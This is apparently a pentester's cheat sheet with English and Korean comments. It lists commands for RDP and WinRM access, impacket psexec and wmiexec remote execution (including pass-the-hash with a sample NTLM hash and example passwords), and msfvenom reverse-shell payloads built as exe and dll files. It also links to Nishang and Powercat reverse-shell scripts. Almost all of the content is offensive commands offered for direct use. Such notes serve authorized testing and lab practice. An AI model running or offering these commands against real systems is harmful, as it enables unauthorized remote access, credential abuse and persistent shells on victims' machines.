Tip

xfreerdp

# NOTE(review): $PWD is the shell's own working-directory variable and $USER is
# normally pre-set to the login name, so unless both are deliberately reassigned
# first, /p: receives a directory path and /u: the local account name. Distinct
# names (e.g. $RDP_USER / $RDP_PASS) avoid the collision.
xfreerdp /v:$IP /u:$USER /p:$PWD /dynamic-resolution
xfreerdp3 /v:$IP /u:$USER /p:$PWD /dynamic-resolution
# The unquoted \\\\ reaches the tool as two literal backslashes — confirm that
# is the DOMAIN\user separator form xfreerdp3 expects (a single backslash is
# written \\ in the shell, or the whole value is single-quoted).
xfreerdp3 /v:$IP /u:$DOMAIN\\\\$USER /p:$PWD /dynamic-resolution
xfreerdp3 /v:$IP /u:$DOMAIN\\\\$USER /pth:$HASH +clipboard

evil-winrm

evil-winrm -i $IP -u [user] -p [password]
evil-winrm -i $IP -u [user] -H [hash] # Pass the Hash

# file transfer
upload <local_path> <remote_path>
download <remote_path> <local_path>

impacket-psexec

# 관리자 권한으로 원격 명령 실행
psexec.py 'wook:w00k413!'@<IP>

# 도메인 계정 사용
psexec.py <domain>/<username>:<password>@<target-ip>
psexec.py acme.local/john.doe:Winter2024!@<IP>
psexec.py ACME/administrator:Password123@10.10.10.5
psexec.py -hashes <hash> <username>@$IP

# NTLM 해시를 이용한 인증 (Pass-the-Hash)
psexec.py administrator@<IP> -hashes <LMHASH>:<NTHASH>
psexec.py administrator@10.10.10.5 -hashes aad3b435b51404eeaad3b435b51404ee:cc36cf7a8514893efccd332446158b1a

# 특정 명령어만 실행
psexec.py administrator:Password123@<IP> "ipconfig /all"

impacket-wmiexec

wmiexec.py [domain]/[user]:[password]@$IP

msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o shell.dll

Nishang

<https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1>

Powercat

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .